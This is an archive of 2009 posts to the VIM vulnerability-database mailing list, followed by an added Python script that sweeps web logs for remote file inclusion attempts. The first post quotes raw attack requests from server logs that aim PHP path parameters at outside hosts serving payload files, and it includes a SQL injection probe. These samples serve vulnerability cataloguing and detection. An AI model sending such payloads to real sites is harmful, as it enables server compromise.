From jericho at attrition.org Sun Nov 1 04:33:57 2009
From: jericho at attrition.org (security curmudgeon)
Date: Sun, 1 Nov 2009 04:33:57 +0000 (UTC)
Subject: [VIM] recent round of RFI from logs

On Thu, 3 Apr 2008, security curmudgeon wrote:

: Quick searches didn't find these in OSVDB. I haven't had time to check
: the other VDBs.

new ones:

/event/list.asp?c=e%2Ename+like+%27B%25%27&all=1

/plugins/spamx/MassDelete.Admin.class.php/geeklog/plugins/spamx/BaseAdmin.class.php?_CONF%5bpath%5d=http://lanaalaadi.com/gallery/data/media/2/3/db.txt%3f%3f

IMGallery galeria.php kategoria Parameter SQL Injection
RFI too?
/pipermail/vim/2006-June.txt%20%20//galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1???

/includes/class_item.php?fileExtension=http://www.diakonia-jkt.sch.id/upload/id1??

/bbshop/admin/admin.php?_shop_path=http://www.diakonia-jkt.sch.id/upload/id1???

/index3.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt?

/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.miomatrimonio.com/editor/aid.txt%3f%3f

/modules/xfsection/modify.php?GALLERY_BASEDIR=http://fmmkor.org/zboard/data/mission/1.swf


From jericho at attrition.org Wed Nov 4 07:56:53 2009
From: jericho at attrition.org (security curmudgeon)
Date: Wed, 4 Nov 2009 07:56:53 +0000 (UTC)
Subject: [VIM] report that str0ke has passed

http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html

Tuesday, November 3, 2009

Str0ke @ Milworm's Funeral is This Friday

Many of us have wondered where str0ke has been and why milw0rm has not been
updated in a good while. I recently was informed that str0ke has been
hospitalized due to a strange condition with his heart, which he has had
since he was a child.

Sadly.... I've just received information that str0ke @ milw0rm has passed
away due to cardiac arrest early this morning at 9:23 AM.

We @ blacksecurity are deeply saddened by the loss of a good hearted friend.
We wish nothing but blessing to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

:o(

Posted by [bl4ck] at 10:26 PM


From coley at linus.mitre.org Wed Nov 4 13:21:21 2009
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 4 Nov 2009 08:21:21 -0500 (EST)
Subject: [VIM] PSArt ?

BUGTRAQ:20091030 PSAtr v1.2 Sql Injection

OK, so nearly everybody in the VDB world is listing the PSArt 1.5 news.asp
id SQL injection vulnerability, but I can't figure out who the vendor is
and whether it's even site-specific or not. I don't see any vendor links
in the DBs. Does anybody have something conclusive?

- Steve


From theall at tenablesecurity.com Wed Nov 4 14:16:49 2009
From: theall at tenablesecurity.com (George A. Theall)
Date: Wed, 4 Nov 2009 09:16:49 -0500
Subject: [VIM] PSArt ?

On Nov 4, 2009, at 8:21 AM, Steven M. Christey wrote:

> BUGTRAQ:20091030 PSAtr v1.2 Sql Injection
>
> OK, so nearly everybody in the VDB world is listing the PSArt 1.5 news.asp
> id SQL injection vulnerability, but I can't figure out who the vendor is
> and whether it's even site-specific or not. I don't see any vendor links
> in the DBs. Does anybody have something conclusive?

Conclusive, no, but I turned up some sites running it by googling for
'inurl:"news.asp" "PSArt'. It seems to be a Chinese language app from
http://www.PSArt.com.cn/ , which now seems to be parked. I don't read
Chinese, though, so I could be totally off the mark.

George
--
theall at tenablesecurity.com


From sanhill at us.ibm.com Wed Nov 4 15:48:36 2009
From: sanhill at us.ibm.com (Sandra Hill)
Date: Wed, 4 Nov 2009 10:48:36 -0500
Subject: [VIM] report that str0ke has passed

str0ke from beyond the grave :)

http://twitter.com/str0ke/statuses/5422531377

Sandra Hill
Security Analyst, X-Force Database Team
Direct: +1 (404) 236 3297
Mail: sanhill at us.ibm.com
Web: www.ibm.com / www.iss.net

From: security curmudgeon
To: vim at attrition.org
Date: 11/04/2009 02:57 AM
Subject: [VIM] report that str0ke has passed
Sent by: vim-bounces at attrition.org

http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html

Tuesday, November 3, 2009

Str0ke @ Milworm's Funeral is This Friday

Many of us have wondered where str0ke has been and why milw0rm has not been
updated in a good while. I recently was informed that str0ke has been
hospitalized due to a strange condition with his heart, which he has had
since he was a child.

Sadly.... I've just received information that str0ke @ milw0rm has passed
away due to cardiac arrest early this morning at 9:23 AM.

We @ blacksecurity are deeply saddened by the loss of a good hearted friend.
We wish nothing but blessing to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

:o(

Posted by [bl4ck] at 10:26 PM


From 1293723872879014599 at mail.orkut.com Mon Nov 16 13:19:14 2009
From: 1293723872879014599 at mail.orkut.com (Dennis Groves)
Date: Mon, 16 Nov 2009 13:19:14 +0000
Subject: [VIM] orkut - Dennis Groves wants you to join orkut!
Message-ID: <1258377554.22.1293723872879014599.4.17305302649282842888@mail.orkut.com>

Dennis Groves wants you to join orkut.

Join now!
http://www.orkut.com/Join.aspx?id=4B00EEDDB6E686A1&mt=22

* * *

What you can do on orkut:

- CONNECT with friends and family using scraps and instant messaging
- DISCOVER new people through friends of friends and communities
- SHARE your videos, pictures, and passions all in one place

Help Center: http://help.orkut.com/support/

* * *

Flooded inbox? Block all orkut users from sending you email by going to:
http://www.orkut.com/Block.aspx?mt=22


From jericho at attrition.org Sun Nov 22 20:08:29 2009
From: jericho at attrition.org (security curmudgeon)
Date: Sun, 22 Nov 2009 20:08:29 +0000 (UTC)
Subject: [VIM] Adobe Flash - vuln or just "design"?

Vuln writeup:
http://www.foregroundsecurity.com/MyBlog/flash-origin-policy-issues.html

Press:
http://www.scmagazineus.com/Researcher-finds-frighteningly-bad-Flash-flaw/article/157734/

Vendor response:
http://blogs.adobe.com/asset/2009/11/flash_content_and_the_same-ori.html


From jericho at attrition.org Mon Nov 23 00:28:18 2009
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 23 Nov 2009 00:28:18 +0000 (UTC)
Subject: [VIM] FCKeditor -> CKEditor

They have recently renamed the product.

http://ckeditor.com/what-is-ckeditor
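The "recent round of RFI from logs" message at the top of this archive lists request paths in which a URL-style value is passed to a parameter the application expects to be a local path (`_CONF[path]`, `kategoria`, `_shop_path`, `mosConfig_absolute_path`, `phpbb_root_path`, `GALLERY_BASEDIR`). The script below is an added example, not code from the list or from any poster, showing how a defender can sweep web server logs for that pattern: it parses Apache-style access log lines, URL-decodes the query string (including PHP array-style names such as `_CONF%5bpath%5d`), flags any parameter whose value begins with an `http://`, `https://` or `ftp://` scheme, and collects the remote hosts for blocklisting or IoC sharing. The sample log lines are constructed for the example and modelled on the request paths in that message; the client addresses and remote hosts are placeholders (`203.0.113.x`, `*.example.invalid`), not the hosts from the original excerpt.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log (Apache combined format). Paths are modelled on the
# 1 Nov 2009 message; hosts and client IPs are placeholders, not real sites.
# Line 1 is a SQL injection probe (not RFI) and line 5 is a normal request,
# so a correct RFI sweep must report only lines 2-4.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Nov/2009:03:12:41 +0000] "GET /event/list.asp?c=e%2Ename+like+%27B%25%27&all=1 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.11 - - [01/Nov/2009:03:14:02 +0000] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF%5bpath%5d=http://rfi-host-a.example.invalid/db.txt%3f%3f HTTP/1.1" 404 221 "-" "libwww-perl/5.8"
203.0.113.12 - - [01/Nov/2009:03:15:55 +0000] "GET /galeria.php?start=0&kategoria=http://rfi-host-b.example.invalid/upload/id1??? HTTP/1.1" 404 221 "-" "libwww-perl/5.8"
203.0.113.13 - - [01/Nov/2009:03:17:30 +0000] "GET /index3.php?_REQUEST=&_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://rfi-host-c.example.invalid//bbs//zfxid1.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.8"
203.0.113.14 - - [01/Nov/2009:03:19:07 +0000] "GET /index.php?page=home HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# client IP, then the request target out of the quoted request line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')

# A parameter value that starts with a remote scheme is the RFI signature.
REMOTE_SCHEME_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def parse_log_line(line):
    """Return (client_ip, request_target) for an access log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group(1), m.group(2)


def find_rfi_attempts(log_text):
    """Scan log text and return one finding per parameter carrying a remote URL."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_log_line(line)
        if parsed is None:
            continue
        client, target = parsed
        parts = urlsplit(target)
        # keep_blank_values so "_REQUEST=&GLOBALS=" style padding is not lost;
        # parse_qsl URL-decodes names and values once (%5b -> [, %3f -> ?)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # second decode catches double-encoded payloads (%253a -> %3a -> :)
            decoded = unquote(value)
            if not REMOTE_SCHEME_RE.match(decoded):
                continue
            # trailing '?' characters are part of the payload, not the host;
            # strip them before pulling the hostname out of the remote URL
            remote = urlsplit(decoded.rstrip("?"))
            findings.append({
                "client": client,
                "path": parts.path,
                "param": name,
                "remote_host": remote.hostname,
            })
    return findings


def remote_hosts(findings):
    """Unique remote hosts seen across findings, sorted, for a blocklist/IoC list."""
    return sorted({f["remote_host"] for f in findings if f["remote_host"]})


if __name__ == "__main__":
    hits = find_rfi_attempts(SAMPLE_LOG)
    for h in hits:
        print(f'{h["client"]} -> {h["path"]} param={h["param"]} remote={h["remote_host"]}')
    print("remote hosts:", ", ".join(remote_hosts(hits)))
```

The sweep keys on the parameter value rather than on a list of known parameter names, so it also catches the next vulnerable script that has not been named in a VDB yet; the cost is that applications which legitimately accept URLs in query parameters (redirect targets, feed readers) will need those parameters whitelisted. Matching a `404` alongside a remote-scheme value, as in the constructed lines, is a useful second signal that the probe hit a script the server does not even have.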